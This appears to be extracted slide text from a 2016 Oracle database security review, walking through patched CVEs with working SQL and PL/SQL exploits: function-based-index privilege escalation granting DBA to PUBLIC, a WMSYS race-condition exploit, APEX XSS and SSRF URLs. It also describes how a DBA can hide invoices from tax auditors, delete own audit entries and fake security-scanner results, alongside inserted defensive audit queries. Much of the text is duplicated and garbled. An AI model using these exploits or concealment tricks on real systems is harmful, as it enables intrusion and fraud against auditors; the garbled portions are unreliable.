exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege Escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust

sqlplus sysman_apm/rds@ora1
SQL> desc dba_users
ERROR:
ORA-04043: object SYS.DBA_USERS does not exist
==> user does not have the privilege to access DBA_USERS

SQL> select * from user_sys_privs;
USERNAME                       PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
SYSMAN_APM                     UNLIMITED TABLESPACE                     NO
SYSMAN_APM                     CREATE VIEW                              NO
SYSMAN_APM                     CREATE ANY LIBRARY                       NO
SYSMAN_APM                     CREATE SEQUENCE                          NO
SYSMAN_APM                     CREATE TABLE                             NO
SYSMAN_APM                     CREATE LIBRARY                           NO
SYSMAN_APM                     CREATE ANY INDEX                         NO
==> CREATE ANY LIBRARY privilege is granted to SYSMAN_APM

SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYSMAN_APM                     CONNECT                        NO  YES NO
SYSMAN_APM                     RESOURCE                       NO  YES NO

==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant dba to public';
  COMMIT;
  RETURN FOO;
END;
/
==> Grant execution privileges to PUBLIC
SQL> grant execute on getdba to public;

==> Create an index on SYSTEM.HELP using a function based index (FBI). The function getdba is used for the function based index.
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));

==> Reconnect is necessary
SQL> select * from dba_role_privs where granted_role='DBA' and grantee='PUBLIC';
GRANTEE                        GRANTED_ROLE                   ADM DEF
------------------------------ ------------------------------ --- ---
PUBLIC                         DBA                            NO  YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
A top manager comes to the office of the DBA and asks you: "Tomorrow the auditor from the tax authority will come to check our invoices. Could you hide the 10000 EUR invoice from the last party at the night club, just from the auditor? I will increase your salary..."
Scenario 2
Remove your own audit entries from the audit log, which is retrieved by the SIEM solution (e.g. Splunk, QRadar, ...) via JDBC.
Scenario 3
You don't have time to harden all your databases, but the security department wants to see results. Instead of fixing the problem you will just deliver the proper results.
A lot of different wishes...
but luckily we are using Oracle.
Problem & Solution
Oracle offers different features to fulfill these wishes without affecting other users...
All these scenarios have in common that we have to manipulate SQL statements.
Select value ...
Oracle Data Redaction allows you to mask or manipulate the selected data just for a single database user.
Possible usage: replace TRUE/FALSE, replace USER/ADMIN, ... the DBA can decide what will be returned.
Select value ...
A typical query from security checklists/scanners looks like this: select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE, but it contains FALSE.
Oracle Data Redaction allows you to change the result value from FALSE to TRUE.
==> The audit department is happy because the database passes all the security checks...
... from table/view ...
Modifying objects can be used as a man in the middle as well.
Possible approaches:
modify views (e.g. add spare='DBA1' to the view dba_audit_trail): all entries of the OS user DBA1 are removed from the view. If a SIEM solution retrieves the audit data, the entries of DBA1 are not retrieved.
create or change synonyms to "redirect" objects
replace a table with a view / instead-of trigger
----- dbms_macadm -----
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;

SQL> create or replace view mydual as select 'X' as dummy from dual where user='DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
... where x=y
WHERE conditions can be changed using VPD.
VPD: add the where clause invoice_name = 'SAUNA_CLUB CHANTAL'
Hide "certain" invoices from the audit department.
Select value from table/view where x=y
The SQL Translation Framework (12c only) allows you to replace an entire query: the user submits query A, the SQL Translation Framework replaces query A with query B.
Possible Countermeasures for paranoid Auditors
Add a random string (e.g. aksdjhiuz) to the query to avoid the SQL Translation Framework (new SQL_ID)
Try to get EXEMPT ACCESS POLICY to disable VPD (even if not used in the application)
Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
Always check the object type (is it really a table?)
Use checksums for certain database objects (especially views)
Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
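As an added example (not from the deck), the countermeasures above turned into a set of dictionary checks an auditor can run before trusting query results. It uses standard Oracle dictionary views only; the object names (DUAL, DBA_AUDIT_TRAIL) are the ones the slides use. The checksum step assumes 12c (DBMS_CRYPTO.HASH_SH256) and EXECUTE on DBMS_CRYPTO, and the last query assumes DBA_REGISTRY_SQLPATCH is populated, i.e. patches applied with datapatch.

```sql
-- Added example, not part of the original presentation. Run with a DBA-level
-- account, connected directly and not through the DBA's own tooling.

-- 1. Which user am I, and in which schema will unqualified names resolve?
SELECT SYS_CONTEXT('USERENV', 'SESSION_USER')   AS session_user,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS current_schema
  FROM sys.dual;                                  -- fully qualified on purpose

-- 2. Where does the public synonym DUAL point, and is the target a table?
--    Expected: exactly one row, SYS / DUAL / TABLE. A view or a different
--    owner is the redirection shown on the DVSYS slide.
SELECT s.table_owner, s.table_name, o.object_type
  FROM dba_synonyms s
  LEFT JOIN dba_objects o
         ON o.owner = s.table_owner AND o.object_name = s.table_name
 WHERE s.owner = 'PUBLIC' AND s.synonym_name = 'DUAL';

-- 3. Row-filtering and rewriting features that change what a query returns.
--    Every row here needs an explanation, whether or not the application
--    uses the feature.
SELECT object_owner, object_name, policy_name, pf_owner, package, function, enable
  FROM dba_policies;                              -- VPD: hidden WHERE clauses

SELECT object_owner, object_name, policy_name, expression, enable
  FROM redaction_policies;                        -- Data Redaction (12c)

SELECT owner, profile_name, translator
  FROM dba_sql_translation_profiles;              -- SQL Translation Framework (12c)

SELECT owner, profile_name, sql_text, translated_text
  FROM dba_sql_translations;                      -- the actual "query A -> query B" rewrites

-- 4. Checksum of a view definition, to compare against a baseline taken from
--    a clean installation at the same patch level. DBMS_METADATA returns the
--    complete DDL, so a predicate appended to DBA_AUDIT_TRAIL changes the hash.
SET SERVEROUTPUT ON
DECLARE
  v_ddl  CLOB := DBMS_METADATA.GET_DDL('VIEW', 'DBA_AUDIT_TRAIL', 'SYS');
  v_hash RAW(32);
BEGIN
  v_hash := DBMS_CRYPTO.HASH(v_ddl, DBMS_CRYPTO.HASH_SH256);   -- HASH_SH256: 12c and later
  DBMS_OUTPUT.PUT_LINE('SYS.DBA_AUDIT_TRAIL SHA-256 = ' || RAWTOHEX(v_hash));
END;
/

-- 5. Cheaper variant: SYS views recreated after the last patch was applied.
SELECT owner, object_name, last_ddl_time
  FROM dba_objects
 WHERE owner = 'SYS'
   AND object_type = 'VIEW'
   AND last_ddl_time > (SELECT MAX(action_time) FROM dba_registry_sqlpatch)
 ORDER BY last_ddl_time DESC;
```

The checks in step 3 deliberately list everything rather than filtering for "suspicious" entries: the point of the slides is that these features are legitimate and therefore invisible to a scanner that only looks at the result of its own query.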
Modifying Queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify application logic (e.g. DB Vault)
DBAs and auditors / security departments should be aware of powerful Oracle features which could be used to modify application logic.
Audit these features even if they are not in use.
Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, ...)
Migration to 12.2
More auditing projects
Integration of auditing with SIEM solutions
Q & A
Thank you
Contact:
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jan 2016 CPU - CVE-2015-4925
SELECT COUNT(*) INTO CNT
  FROM V$OPEN_CURSOR OC, V$SQL S, V$OBJECT_DEPENDENCY OD
 WHERE OC.SID = USER_SID AND [...] AND OD.TO_TYPE IN (7, 8, 9, 11);
Here OD.TO_TYPEs 7, 8, 9 and 11 are functions, procedures, packages and objects. If any such dependency exists, then the user-supplied query will not be executed and an error is raised:
IF (CNT > 0) THEN WMSYS.WM_ERROR.RAISEERROR(WMSYS.LT.WM_ERROR_81_NO); END IF;
SQL_STR2 := 'declare delstatuses wmsys.ltUtil.number_tab; begin select WM_delstatus bulk collect into delstatuses from '
            || WMSYS.LTUTIL.GETVN(TABLE_OWNER, TAB_NAME, '_BASE')
            || ' where WM_version = ' || CURVER || ' and ' || NEWWHERE_CLAUSE || ' for update; end;';
WMSYS.LTADM.EXECSQL(SQL_STR2);
Jan 2016 CPU - CVE-2015-4925
SQL> CONNECT RACER/PASSWORD
SQL> CREATE TABLE FOO(X NUMBER, CONSTRAINT X_PK PRIMARY KEY(X));
SQL> INSERT INTO FOO (X) VALUES (1);
SQL> COMMIT;
SQL> EXEC WMSYS.LT.ENABLEVERSIONING('FOO');
SQL> create or replace function Y return number authid current_user is
  pragma autonomous_transaction;
begin
  dbms_output.put_line('BANG');
  execute immediate 'create or replace procedure owned(p varchar) is begin execute immediate p; end;';
  execute immediate 'grant execute on owned to public';
  dbms_output.put_line(sys_context('userenv', 'current_user'));
  return 1;
end;
/
Jan 2016 CPU - CVE-2015-4925
SQL> GRANT EXECUTE ON Y TO PUBLIC;
SQL> CREATE TABLE RACER(Y NUMBER);
SQL> INSERT INTO RACER(Y) VALUES (1);
SQL> COMMIT;
SQL> create or replace procedure attempt_it is
begin
  execute immediate 'BEGIN WMSYS.LT.COPYFORUPDATE(''FOO'', ''X=LENGTH((SELECT 1 FROM RACER.RACER WHERE RACER.Y=1))''); END;';
exception when others then
  null;
end;
/
SQL> declare
  i number := 0;
begin
  for i in 1..1000 loop
    execute immediate 'alter table RACER.RACER rename column Y to Z';
    execute immediate 'alter table RACER.RACER rename column Z to Y';
  end loop;
end;
/
Jan 2016 CPU - CVE-2015-4925
SQL> DESC WMSYS.OWNED
PROCEDURE WMSYS.OWNED
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 P                              VARCHAR2                IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 9.0)
1 OLAP (CVSS 7.8)
3 RDBMS Security (CVSS 5.9, 3.3, 3.3; 1 remote)
http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html
Apr 2016 CPU - CVE-2016-0690
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: AUDIT NOT EXISTS fails to capture attempts to execute a procedure that does not exist, either because the user does not have the execute privilege on it or because the procedure does not exist. If a DBA wants to capture attempts to execute procedures where the user does not have the execute privilege, we must also add:
Reporter: David Litchfield
Exploit:
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL;
Apr 2016 CPU - CVE-2016-0691
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: If a function that is missing (due to no execute privilege) is used within a SELECT query, the name of the function is not logged, but the name of the table in the query is.
Reporter: David Litchfield
Exploit: obvious, Create Java Source...
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 9.0)
1 JDBC (CVSS 8.1, remote)
1 Portable Clusterware (CVSS 7.5, remote)
1 Data Pump (CVSS 6.7)
2 APEX (CVSS 6.1, 5.8; 2 remote)
1 RDBMS Security (CVSS 5.3, remote)
DB Sharding (CVSS 4.4)
1 Database Vault (CVSS 3.4)
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
Jul 2016 CPU - CVE-2016-3448
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: The HTMLDB_UTIL PL/SQL package is vulnerable to an XSS flaw. To access it, the schema (APEX_050000) needs to be specified first; this is possible, however, because the config file whitelists "apex".
Reporter: David Litchfield
Exploit:
http://example.com/ords/apex_050000.htmldb_util.JSON_FROM_ARRAY?P_COLS=1&P_NAME01=XX%22%3E%3CH1%3EOops%3C/H1%3E&P_F01=Y&P_ROWS=1
Jul 2016 CPU - CVE-2016-3467
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: APEX 5 is vulnerable to a server side request forgery flaw, i.e. it can be made to connect to another web server and port regardless of whether allowed URLs have been configured. For example, the request below will connect to someotherserver on the given port and POST X as a payload. This can be used as a port scanning mechanism, used to attack systems protected by a firewall etc.
Reporter: David Litchfield
Exploit:
http://example/ords/apex_050000.WWV_FLOW_WEBSERVICES_API.MAKE_REQUEST?P_URL=http://someotherserver:port&p_envelope=X
Apr 2016 CPU - CVE-2016-3488
Problem: The package dbms_gsm_common allows changing database parameters without the admin privileges and without a restart.
Reporter: Bruno Cirone
Exploit:
exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY', 'TRUE');
Jul 2016 CPU - CVE-2016-3488
-- as SYS
SQL> select name, value from v$parameter where name='O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY FALSE
-- as user GSMUSER
SQL> exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY', 'TRUE');
PL/SQL-Prozedur erfolgreich abgeschlossen.
-- as user SYS - re-run again after execution of the package
SQL> select name, value from v$parameter where name='O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU - CVE-2016-3484
Problem: SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter: Alexander Kornbrust
Problem (Details + Exploit later...)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;
July 2016 CPU - CVE-2016-3489
Problem: Privilege escalation via INDEX privilege and function based index (FBI)
Reporter: Alexander Kornbrust
July 2016 CPU - CVE-2016-3489
-- Oracle 11.2.0.4, connected as SYSTEM
SQL> select grantee, owner, table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = 'INDEX' AND GRANTEE <> OWNER and owner='SYS';
GRANTEE                        OWNER                          TABLE_NAME
------------------------------ ------------------------------ ------------------------------
SYSTEM                         SYS                            INCEXP
SYSTEM                         SYS                            INCFIL
SYSTEM                         SYS                            INCVID
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on getdba to public;
July 2016 CPU - CVE-2016-3489
==> SYSTEM does not have access to the SYS.LINK$ table
SQL> select count(*) from sys.link$;
ERROR at line 1:
ORA-01031: insufficient privileges
==> also the execution of getdba throws an error
SQL> select getdba('i') from dual;
ERROR at line 1:
ORA-01031: insufficient privileges
ORA-06512: at "SYSTEM.GETDBA", line 4
==> Now create an index on the table sys.incvid using a function based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));
Index created.
SQL> select count(*) from sys.link$;
  COUNT(*)
----------
        11
July 2016 CPU - CVE-2016-3489
-- Oracle 12.1.0.2 (SYSTEM does no longer have INHERIT ANY PRIVILEGES)
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA(1));
CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA(1))
FEHLER in Zeile 1:
ORA-06598: Nicht ausreichende INHERIT PRIVILEGES-Berechtigung
ORA-06512: in "SYSTEM.GETDBA", Zeile 1
-- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use
-- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on wmsys.getdba to public;
-- now we create the index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
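Added example, not part of the presentation, covering both function-based-index escalations in this deck (CVE-2016-5604 in the Cloud Control section and CVE-2016-3489 here): the dictionary queries a DBA can run to find who holds the preconditions, and the 12c INHERIT PRIVILEGES hardening step. Standard dictionary views only; the account names in the REVOKE are illustrative.

```sql
-- Added example, not part of the original presentation. Run as a DBA.

-- 1. Who can create an index on another schema's table, create code in
--    another schema, or inherit anyone's privileges?
SELECT grantee, privilege AS how,
       CAST(NULL AS VARCHAR2(128)) AS owner, CAST(NULL AS VARCHAR2(128)) AS table_name
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE ANY INDEX', 'CREATE ANY PROCEDURE', 'INHERIT ANY PRIVILEGES')
UNION ALL
SELECT grantee, privilege, owner, table_name            -- the object-level INDEX privilege from the slide
  FROM dba_tab_privs
 WHERE privilege = 'INDEX' AND grantee <> owner
 ORDER BY 1, 2;

-- 2. Invoker-rights functions that PUBLIC may execute. Used in an index
--    expression, such a function runs with the privileges in effect when the
--    expression is evaluated, not with those of its owner; on the slides that
--    was enough to reach SYS.LINK$.
SELECT p.owner, p.object_name
  FROM dba_procedures p
  JOIN dba_tab_privs t ON t.owner = p.owner AND t.table_name = p.object_name
 WHERE p.object_type = 'FUNCTION'
   AND p.authid = 'CURRENT_USER'
   AND t.grantee = 'PUBLIC'
   AND t.privilege = 'EXECUTE'
 ORDER BY 1, 2;

-- 3. 12c: which schemas may inherit the privileges of which users?
--    Since 12.1 an invoker-rights unit needs INHERIT PRIVILEGES on the
--    invoking user; Oracle grants it on each user to PUBLIC by default.
--    Look at SYS, SYSTEM, WMSYS and DVSYS in particular.
SELECT grantee, table_name AS user_name
  FROM dba_tab_privs
 WHERE privilege = 'INHERIT PRIVILEGES'
   AND type = 'USER'
 ORDER BY table_name, grantee;

-- 4. Hardening: take the default grant away from privileged accounts whose
--    sessions evaluate other schemas' code. ORA-06598 (the error on the
--    12.1.0.2 slide) is what the inherit check raises when it fails.
REVOKE INHERIT PRIVILEGES ON USER system FROM PUBLIC;
```

Step 1 is the slide's own DBA_TAB_PRIVS query generalised to the system privileges that give the same capability; the object-level INDEX grants on SYS tables (INCEXP, INCFIL, INCVID) are an installation default, so the interesting rows are the ones added later.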
August 2016
Hackproofing Oracle's eBusiness Suite by David Litchfield
Presentation + Supporting documents
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf
September 2016
Nothing special happened
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 9.1)
2 Kernel PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
Oct 2016 CPU - CVE-2016-5497
Problem: UNSALTED MD5 HASH STILL PRESENT IN 12C DATABASE - DIGEST VERIFIER
Shown as an open problem in the DOAG 2015 presentation.
Reporter: Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege Escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust

sqlplus sysman_apm/rds@ora1

SQL> desc dba_users
ERROR:
ORA-04043: object SYS.DBA_USERS does not exist

==> user does not have the privilege to access DBA_USERS

SQL> select * from user_sys_privs;
USERNAME                       PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
SYSMAN_APM                     UNLIMITED TABLESPACE                     NO
SYSMAN_APM                     CREATE VIEW                              NO
SYSMAN_APM                     CREATE ANY LIBRARY                       NO
SYSMAN_APM                     CREATE SEQUENCE                          NO
SYSMAN_APM                     CREATE TABLE                             NO
SYSMAN_APM                     CREATE LIBRARY                           NO
SYSMAN_APM                     CREATE ANY INDEX                         NO

==> CREATE ANY LIBRARY privilege is granted to SYSMAN_APM

SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYSMAN_APM                     CONNECT                        NO  YES NO
SYSMAN_APM                     RESOURCE                       NO  YES NO

==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  2    PRAGMA AUTONOMOUS_TRANSACTION;
  3  BEGIN
  4    execute immediate 'grant dba to public';
  5    COMMIT;
  6    RETURN FOO;
  7  END;
  8  /

==> Grant execution privileges to PUBLIC
SQL> grant execute on getdba to public;

==> Create an index on SYSTEM.HELP using a function based index (FBI). The function getdba is used for the function based index.
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));

==> Reconnect is necessary
SQL> select * from dba_role_privs where granted_role='DBA' and grantee='PUBLIC';
GRANTEE                        GRANTED_ROLE                   ADM DEF
------------------------------ ------------------------------ --- ---
